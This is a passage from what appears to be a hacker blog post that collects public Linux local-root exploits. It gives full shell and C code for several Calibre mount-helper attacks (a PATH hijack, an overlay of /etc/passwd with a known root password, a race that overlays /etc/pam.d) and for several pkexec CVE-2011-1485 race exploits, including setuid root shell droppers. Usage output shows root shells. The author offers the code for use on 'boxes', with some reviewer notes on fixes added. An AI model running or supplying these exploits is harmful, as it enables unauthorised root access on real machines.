				rmdir("/media/staging/tmp");
				close(fd);
			}
		}
	} else {
		/* First child: the same overlay toggler as above. */
		while (1) {
			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
			symlink("/dev/ram0", "/dev/shm/overlay");
			unlink("/dev/shm/overlay");
			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
		}
		return 0;	/* unreachable */
	}
	printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n");
	system("su");
	return 0;
}

Then of all the calibers…

#!/bin/sh
                  #######################################
                  #     .50-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################
################################################################################
# Calibre uses a suid mount helper, and like nearly all suid mount helpers that
# have come before it, it's badly broken. Let's go through Calibre's faulty code
# available at http://pastebin.com/auz9SULi and look at the array of silly
# things done, only one of which we actually need to get root.
# In this spot here, we can create a directory owned by root anywhere we want:
# 47    if (!exists(mp)) {
# 48        if (mkdir(mp, S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH) != 0) {
# 49            errsv = errno;
# 50            fprintf(stderr, "Failed to create mount point with error: %s\n", strerror(errsv));
# 51        }
# 52    }
# At this point, we can remove any empty directory we want:
# 172    rmd = rmdir(mp);
# And elsewhere, we can create and remove anything_we_want/.some_stupid_marker.
# I'm sure you can figure out how to exploit these kinds of things :-P .
# We also get the ability with this wonderful mount-helper to unmount and eject
# any device that we want (as root), as well as mount any vfat filesystem that
# we'd like.
# Not only that, but we can pass params directly to mount, to some degree:
# 83    execlp("mount", "mount", "-t", "auto", "-o", options, dev, mp, NULL);
# On this line, "dev" and "mp" are controlled by argv[2] and argv[3]. I'm sure
# you can find fun things to do with this as well. (There -s and also the man
# pages say the last -o is respected, etc etc. Be creative.)
# But there's also something lurking that is way worse in this line. Is that
# "execlp" we see? Yes.  According to the man pages:
#     The execlp(), execvp(), and execvpe() functions duplicate the  actions  of
#     the  shell  in searching  for  an  executable file if the specified
#     filename does not contain a slash (/) character.
# execlp searchs PATH for where to find "mount", and then runs it as root. And,
# with great joy, we find that we can trivially control PATH by setting it
# before running the mount helper. So the attack plan is simple:
#
#    1. Make an executable named "mount" in the current directory that executes
#       a shell.
#    2. PATH=".:$PATH" calibre-mount-helper mount something somethingelse
#
# And that's it! We have root. The below exploit creates things in a temporary
# directory that gets cleaned up and displays some status information along the
# way.
# - zx2c4
# 2011-11-1
#
# Usage:
# $ ./50calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.q5ktd8UcxP
# [+] Making mount point.
# [+] Writing malicious mounter.
# [+] Overriding PATH and getting root.
# [+] Cleaning up: /tmp/tmp.q5ktd8UcxP
# [+] Checking root: uid=0(root) gid=0(root) groups=0(root)
# [+] Launching shell.
# sh-4.2#
################################################################################
# Review note: the root cause is a setuid program resolving "mount" through the
# caller-controlled PATH (execlp).  The defensive fix is to exec the helper's
# children by absolute path and/or reset PATH to a fixed value before exec;
# from the host side, a non-root invocation of calibre-mount-helper with a
# PATH that starts with "." or a user-writable directory is the signal.

set -e                                  # abort on the first failing command
echo "#######################################"
echo "#     .50-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"                      # private scratch dir; removed by the payload
echo "$dir"
cd "$dir"
echo "[+] Making mount point."
mkdir mountpoint
echo "[+] Writing malicious mounter."
# Unquoted heredoc delimiter: "$dir" below is expanded *now*, so the written
# script carries the literal temp path and can delete it.
cat > mount <<END
#!/bin/sh
cd /
echo "[+] Cleaning up: $dir"
rm -rf "$dir"
echo -n "[+] Checking root: "
id
echo "[+] Launching shell."
HISTFILE="/dev/null" exec /bin/sh
END
chmod +x mount
echo "[+] Overriding PATH and getting root."
# "." first in PATH makes the helper's execlp("mount", ...) find ./mount.
PATH=".:$PATH" calibre-mount-helper mount /dev/null mountpoint

Then one also by the same author but, he messes up the username bit a little here… I prefer the 3rd code for this exploit.. but here is no.3 anyhow ;s

# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh
                  #######################################
                  #     .60-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################
################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundamental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
# - zx2c4
# 2011-11-2
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################
# Review notes: the script has no "set -e", so a failing step (dd, mkfs, the
# helper) is ignored and later steps run anyway.  The "#!/bin/sh" line is not
# the first line of this listing, so as pasted it runs under whatever shell
# the caller uses.  Observable traces: an "overlay" image and "staging" dir
# under a mktemp directory, and a vfat mount on /etc until it is unmounted.

echo "#######################################"
echo "#     .60-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200      # 51200 x 512-byte blocks (per the usage output)
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
# Drops the first line of the copied passwd (assumed to be root's entry -- not
# verified) and appends a root line whose password field is an MD5-crypt
# ("openssl passwd -1") hash of "toor", so no shadow entry is consulted for it.
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
# The helper mounts the attacker-controlled image on top of /etc (the
# "mount anything anywhere" flaw described in the header).
calibre-mount-helper mount overlay /etc  >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
# The -c command runs as root: it unmounts /etc (restoring the real files),
# removes the temp dir and execs a shell with history disabled.
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

As you see thats abit messy when it comes to changing a set password… ;s

This is DRossenbergs version of the overlay bug which is slightly nicer, because it probably won't mess too much with the password of user…

#!/bin/sh
             ###########################################
             #         .70-Caliber Assault Mount      #
             #  by Dan Rosenberg (@djrbliss) and zx2c4 #
             ###########################################
################################################################################
# Yesterday we learned how Calibre's ability to mount anything anywhere resulted
# in a local root. Today's exploit shows a race condition to subvert recent
# changes preventing symlinks and checking path prefixes.
# - djrbliss & zx2c4
# 2011-11-3
################################################################################
# Review notes: no "set -e", so every failure is ignored.  The C helper below
# is written through an *unquoted* heredoc, so the shell variables in it are
# substituted into the C source before gcc sees it.  Traces left on the host:
# the image at the "overlay" path, the "staging" mount, "/tmp/pwn.c" and
# "/tmp/pwn", and a mount of the image on top of the "target" directory.
overlay=/dev/shm/overlay
staging=/media/staging
mounter=calibre-mount-helper
fakemount=/media/staging/fake
target=/etc/pam.d
mkfsntfs=/sbin/mkfs.ntfs     # distro-dependent; the .80 C version uses /usr/sbin

echo "[+] Making overlay image:"
dd if=/dev/zero of=$overlay count=51200
$mkfsntfs -F $overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
$mounter mount $overlay $staging
echo "[+] Copying /etc/pam.d/ into overlay."
cp /etc/pam.d/* $staging/ 2>/dev/null
# Only common-auth is rewritten (pam_deny -> pam_permit) in this variant.
sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth
echo "[*] Making fake mountpoint."
rm -rf $fakemount 2>/dev/null
echo "[*] Preparing binary payload..."
# pwn.c: parent waits (inotify IN_CREATE) for something to appear inside the
# fake mount point, then renames the directory away and replaces it with a
# symlink to the target directory; the child sleeps 1 s and asks the helper to
# mount the overlay on the fake path.  mkdir() is implicitly declared (no
# <sys/stat.h>) and called with one argument, so its mode is unspecified.
# The process the shell waits on is the parent, which returns 0 once its
# read() returns; the child's system() status is not propagated.
cat > /tmp/pwn.c << _EOF
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char **argv) {
int fd, wd, ret;
if (fork()) {
fd = inotify_init();
unlink("$fakemount");
mkdir("$fakemount");
wd = inotify_add_watch(fd, "$fakemount", IN_CREATE);
read(fd, 0, 0);
rename("$fakemount", "$staging/tmp");
symlink("$target", "$fakemount");
rmdir("$staging/tmp");
return 0;
} else {
sleep(1);
return system("$mounter mount $overlay $fakemount");
}
return 0;
}
_EOF
gcc /tmp/pwn.c -o /tmp/pwn
# Re-run until /tmp/pwn exits 0 (see the note on the exit status above).
ret=1
while [ $ret -ne 0 ]; do
/tmp/pwn
ret=$?
done;
sleep 2
echo "[+] Asking for root. When prompted for a password, type anything and press enter."
# With pam_permit in the overlaid common-auth, su is expected to accept any
# password; the -c command then unmounts both mounts, deletes the image and
# execs a history-less shell.
su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

Alot of nice work for a shitty little local… well, i guess it is OK for some boxes..
xd– / #HaxNET@EFnet

Policykit ( pkexec) Multiple exploit codes

Posted on 1st November 2011 in Codes, Exploits

Here is a nice .c version but… there is a few ways this can be made…read on…
pkexec Race condition (CVE-2011-1485) exploit (.c) .. thanks to x10d4n ;) good work friend

/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us  @ http://www.wooyun.org :)
*/
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>

/*
 * pkexec parent-uid race (CVE-2011-1485), self-re-executing variant.
 *
 * How it runs:
 *  - If the effective uid is already 0 (i.e. this binary has been made
 *    setuid-root by a previous round), drop to uid/gid 0 and exec /bin/sh.
 *  - Otherwise loop up to 500 times.  Each round forks a child that in turn
 *    forks a grandchild: the grandchild runs
 *    "pkexec /bin/sh -c 'chown root:root <self>; chmod 4755 <self>'" with
 *    stdout/stderr redirected into pipe1, and the child -- pkexec's parent --
 *    execs the setuid-root /usr/bin/chfn after a tunable usleep so that its
 *    effective uid is 0 while pkexec stat(2)s /proc/<parent>.
 *  - The top-level process reads pkexec's output from pipe1; if it contains
 *    "does not match" (pkexec's mitigation message, see the polkit-pwnage
 *    header below) the delay is increased and jittered, otherwise decreased.
 *    It then stat()s its own binary and, once it is root-owned with the
 *    setuid bit (st_mode & 0x800 == S_ISUID), execs itself.
 *
 * Review notes (no behavior changed):
 *  - The "// Parent" comments in the original were wrong: fork() returns 0
 *    in the *child*, so those branches are the child and grandchild.
 *  - chfn_path is declared but never used; argc is unused.
 *  - realpath(argv[0], real_path) may write up to PATH_MAX bytes, but
 *    real_path is 512 bytes.
 *  - pipe3 (int[2]) is reused as a struct pollfd via a pointer cast; this
 *    relies on sizeof(struct pollfd) == 8 and breaks strict aliasing.
 *  - No wait() is ever called, so every round leaves zombie children.
 *  - tcsetattr(0, 2, ...) restores the saved terminal state each round
 *    (2 is TCSAFLUSH on glibc); chfn/pkexec may alter the tty in between.
 *  - The chown/chmod run by pkexec targets this binary's own resolved path;
 *    a root-owned setuid copy of an unprivileged user's binary, and the
 *    repeated "does not match" message from pkexec, are the visible traces.
 *    The underlying bug is fixed in polkit 0.102 per the header below.
 */
int main(int argc,char *argv[], char ** envp) {
	time_t tim_seed1;
	pid_t pid_seed2;
	int result;
	struct stat stat_buff;
	char * chfn_path = "/usr/bin/chfn";	/* unused */
	char cmd_buff[4096];
	char * pkexec_argv[] = {
	"/usr/bin/pkexec",
	"/bin/sh",
	"-c",
	cmd_buff,
	NULL
	};
	int pipe1[2];	/* pkexec stdout/stderr -> top-level process */
	int pipe2[2];	/* grandchild -> child: "I am about to exec pkexec" */
	int pipe3[2];	/* child -> grandchild: "go"; later reused as a pollfd */
	pid_t pid,pid2 ;
	char * chfn_argv[] = {
	"/usr/bin/chfn",
	NULL
	};
	char buff[8];
	char read_buff[4096];
	char real_path[512];	/* NOTE: realpath() may need PATH_MAX bytes */
	struct termios termios_p;
	int count = 0;
	int flag = 0;
	int usleep1 = 0;	/* adaptive delay before chfn is exec'd */
	int usleep2 = 0;	/* random jitter added on "does not match" */
	bzero(cmd_buff,4096);
	bzero(real_path,512);
	realpath(argv[0],real_path);
	tim_seed1 = time(NULL);
	pid_seed2 = getpid();
	srand(tim_seed1+pid_seed2);
	//get terminal attr (restored after every round below)
	tcgetattr(0,&termios_p);
	/* The command pkexec will run as root: make this binary setuid-root. */
	snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
	if(! geteuid()) {
	/* Already running with euid 0 (re-exec'd after a successful round). */
	char *exec_argv[2]={
	"/bin/sh",
	NULL
	};
	setuid(0);
	setgid(0);
	execve("/bin/sh",exec_argv,0);
	perror("execve shell");
	exit(-1);
	}
	printf("pkexec local root exploit by xi4oyu , thx to dm\n");
	if(pipe(pipe1)) {
	perror("pipe");
	exit(-2);
	}
	/* flag is only set right before an execve() that does not return, so
	 * this loop effectively runs up to 500 rounds. */
	for(count = 500; count && !flag; count--) {
	pid = fork();
	if( !pid ){
	// child (fork() returned 0) -- the original comment said "Parent"
	if( !pipe(pipe2)) {
	if(!pipe(pipe3)) {
	pid2 = fork();
	if(!pid2){
	// grandchild (fork() returned 0) -- the original comment said "Parent 2";
	// this is the process that becomes pkexec
						close(1);
						close(2);
						close(pipe1[0]);
						dup2(pipe1[1],2);
						dup2(pipe1[1],1);
						close(pipe1[1]);
						close(pipe2[0]);
						close(pipe3[1]);
						write(pipe2[1],"\xFF",1);	/* signal readiness */
						read(pipe3[0],&buff,1);		/* wait for "go" */
						execve(pkexec_argv[0],pkexec_argv,envp);
						perror("execve pkexec");
						exit(-3);
					}
					/* child: pkexec's parent.  Release the grandchild, wait the
					 * tuned delay, then become setuid-root chfn (euid 0). */
					close(0);
					close(1);
					close(2);
					close(pipe2[1]);
					close(pipe3[0]);
					read(pipe2[0],&buff,1);
					write(pipe3[1],"\xFF",1);
					usleep(usleep1+usleep2);
					execve(chfn_argv[0],chfn_argv,envp);
					perror("execve setuid");
					exit(1);
				}
			}
			perror("pipe3");
			exit(1);
		}
		//Note: This is the top-level process; no pipe3 here, its storage is
		//reused as a struct pollfd (relies on sizeof(struct pollfd) == 8).
		memset(pipe3,0,8);
		struct pollfd * pollfd = (struct pollfd *)(&pipe3);
		pollfd->fd = pipe1[0];
		pollfd->events =  POLLRDNORM;
		if(poll(pollfd,1,1000) < 0){
			perror("poll");
			exit(1);
		}
		if(pollfd->revents & POLLRDNORM ){
			memset(read_buff,0,4096);
			read(pipe1[0],read_buff,4095);
			/* pkexec printed its uid-mismatch message: chfn was too early. */
			if( strstr(read_buff,"does not match")){
				usleep1 += 500;
				usleep2 = rand() % 1000;
			}else{
				usleep1 -= 500;
			}
		}
		/* Did the chown/chmod run?  Check owner, group and S_ISUID (0x800). */
		if(!stat(real_path,&stat_buff)){
			if(!stat_buff.st_uid){
				if(!stat_buff.st_gid){
					if(stat_buff.st_mode & 0x800){
						char *exec_array[]={
							real_path,
							NULL
						};
						flag = 1;
						tcsetattr(0,2,&termios_p);
						/* Re-exec self; the geteuid()==0 path above then runs. */
						execve(real_path,exec_array,0);
						perror("execve self");
						exit(1);
					}
				}
			}
		}
		tcsetattr(0,2,&termios_p);	/* undo any tty changes made by chfn/pkexec */
	}
		result = 0;
		return result;
}

Thats a VERY nice version but there is more ways to exploit this… so lets keep on goin!

/* polkit-pwnage.c
 *
 * ==============================
 * =      PolicyKit Pwnage      =
 * =          by zx2c4          =
 * =        Sept 2, 2011        =
 * ==============================
 * Howdy folks,
 * This exploits CVE-2011-1485, a race condition in PolicyKit.
 * davidz25 explains:
 * --begin--
 * Briefly, the problem is that the UID for the parent process of pkexec(1) is
 * read from /proc by stat(2)'ing /proc/PID. The problem with this is that
 * this returns the effective uid of the process which can easily be set to 0
 * by invoking a setuid-root binary such as /usr/bin/chsh in the parent
 * process of pkexec(1). Instead we are really interested in the real-user-id.
 * While there's a check in pkexec.c to avoid this problem (by comparing it to
 * what we expect the uid to be - namely that of the pkexec.c process itself which
 * is the uid of the parent process at pkexec-spawn-time), there is still a short
 * window where an attacker can fool pkexec/polkitd into thinking that the parent
 * process has uid 0 and is therefore authorized. It's pretty hard to hit this
 * window - I actually don't know if it can be made to work in practice.
 * --end--
 * Well, here is, in fact, how it's made to work in practice. There is as he said an
 * attempted mitigation, and the way to trigger that mitigation path is something
 * like this:
 *     $ sudo -u `whoami` pkexec sh
 *     User of caller (0) does not match our uid (1000)
 *
 * Not what we want. So the trick is to execl to a suid at just the precise moment
 * /proc/PID is being stat(2)'d. We use inotify to learn exactly when it's accessed,
 * and execl to the suid binary as our very next instruction.
 *
 * ** Usage **
 * $ pkexec --version
 * pkexec version 0.101
 * $ gcc polkit-pwnage.c -o pwnit
 * $ ./pwnit
 * [+] Configuring inotify for proper pid.
 * [+] Launching pkexec.
 * sh-4.2# whoami
 * root
 * sh-4.2# id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * sh-4.2#
 *
 * ** Targets **
 * This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
 * as of writing uses 0.101, has backported 0.102's bug fix. A way to check
 * this is by looking at the mtime of /usr/bin/pkexec -- April 22, 2011 or
 * later and you're out of luck. It's likely other distributions do the same.
 * Fortunately, this exploit is clean enough that you can try it out without
 * too much collateral.
 * greets to djrbliss and davidz25.
 * - zx2c4
 * 2-sept-2011
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

/*
 * PoC for CVE-2011-1485: pkexec reads its parent's *effective* uid from
 * /proc/PID (see the header comment above).
 *
 * After fork():
 *  - The parent closes stdio, sets an IN_ACCESS inotify watch on its own
 *    /proc/<pid> entry and blocks in read() until that entry is accessed
 *    (pkexec's stat(2)).  It then immediately execs the setuid-root
 *    /usr/bin/chsh so its effective uid is 0 while pkexec is still looking.
 *  - The child sleeps one second so the watch is in place, then execs
 *    "pkexec /bin/sh"; if the race is won pkexec treats the parent as root.
 *
 * Review notes: inotify_init() failure is reported but not fatal (the
 * following calls would then run with fd == -1); the zero-length read() is
 * used only as a blocking wait and its result is ignored; argc/argv are
 * unused.  Per the header, polkit >= 0.102 (and Ubuntu's backport) fixes
 * the bug, so an up-to-date pkexec is the mitigation; the uid-mismatch
 * message pkexec prints on a lost race is the visible trace of attempts.
 * Always returns 0 (only reached if an exec fails).
 */
int main(int argc, char **argv) {
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=============================\n\n");
    if (fork()) {
        /* parent: will become the setuid chsh, i.e. pkexec's parent */
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
        perror("[-] inotify_init");   /* not fatal; fd stays -1 */
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);            /* blocking wait for the access event */
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        /* child: give the parent time to arm the watch, then run pkexec */
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

now, we found a simple .sh version of this exploit, however, it was NOT written too well… so i adjusted it and seems to be working now.. will show you here…

this code is OLD code which was posted, actually, it had even wrong paths in the makesuid section…anyhow, we will fix this now using the .c exploits…
Oh btw, that suid.c makes the shell kinda die :P so, we might need to adjust that also…

#!/bin/sh
## Polkit pwnage shell version wich was released, now re-released...
#
# Shell wrapper around polkit-pwnage (CVE-2011-1485).  Writes a setuid payload
# and the race driver as C sources, compiles both and runs the race.
#
# Review notes on suid.c as written below:
#  - The "##..." lines are *not* C comments.  A line starting with '#' is a
#    preprocessing directive, so gcc is expected to reject suid.c with an
#    invalid-directive error (consistent with the post saying this version
#    "makes the shell kinda die").
#  - setgid()/setuid()/execl() are used without <unistd.h>, so they are
#    implicitly declared.
#  - execl() is terminated with the integer 0 rather than (char *)NULL; for a
#    variadic call this is not a guaranteed null pointer on every ABI.
cat > suid.c << _EOF
#include <stdio.h>
#include <string.h>

int main(void) {  // looks abit better... altho, i have to test it now..
##char *root=malloc(1000);
##char perintah[256]="/bin/sh -c ";
setgid(0);
setuid(0);
##strcat(root,perintah);
execl("/bin/sh","sh",0);
}
_EOF
# NOTE(review): "//" is not comment syntax in sh; the next line is executed as
# a command named "//" (the root directory), which fails and is ignored.
// ok we have fixed the paths here... lets fix our suid shell...
# makesuid.c: same race driver as polkit-pwnage.c above -- the parent arms an
# IN_ACCESS watch on its own /proc/<pid>, blocks in a zero-length read() and
# then execs the setuid chsh; the child sleeps 1 s and execs "pkexec /bin/sh".
# argc/argv are never read.  pid_path[15] fits "/proc/" + up to 8 digits.
cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(1);
printf("[+] Launching pkexec.\n");
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);  // our modified shell here
}
return 0;
}
_EOF

gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
# NOTE(review): makesuid ignores its arguments (see main() above), so the
# chown/chmod words on these two lines are not acted on by the program; each
# line just runs the race once more.
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "-> Your suid is on /tmp/suid make sure u move this !!!"
# suid.c takes no arguments; "-c /bin/sh" is ignored.
/tmp/./suid -c /bin/sh

OK so, we have 2 working .c versions and, one sh version which is very easy to fix, if it does not work already, which it should… but then, i am using the public codes , and, i can see that pkexec is on alottt of boxes!
enjoy!
xd

edit:
here is a better version perhaps…

#!/bin/sh
## policykit-pwnage.c -> to -> bash version =)
#
# Cleaned-up shell wrapper around polkit-pwnage (CVE-2011-1485).  Compared to
# the version above, suid.c now includes <unistd.h>, has no "##" lines and
# terminates execl() with NULL.  Nothing is error-checked; gcc is assumed.
#
# suid.c: drop to gid/uid 0 and exec /bin/sh.  It ignores its arguments.
cat > suid.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main (void) {
setgid(0);
setuid(0);
execl("/bin/sh", "sh", NULL);
}
_EOF

# makesuid.c: race driver.  Parent arms an IN_ACCESS inotify watch on its own
# /proc/<pid>, blocks in a zero-length read() and then execs the setuid chsh
# so its effective uid is 0 when pkexec stat()s it; the child execs
# "pkexec /bin/sh".  argc/argv are never read; syscall results are ignored.
cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
_EOF

gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
# NOTE(review): makesuid ignores its arguments, so the chown/chmod words on
# these lines are not passed anywhere; each line just runs the race again.
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "-> Your suid shell is on /tmp/suid make sure u move this !"
# suid.c takes no arguments; "-c /bin/sh" is ignored.
/tmp/./suid -c /bin/sh

Enjoy x2 !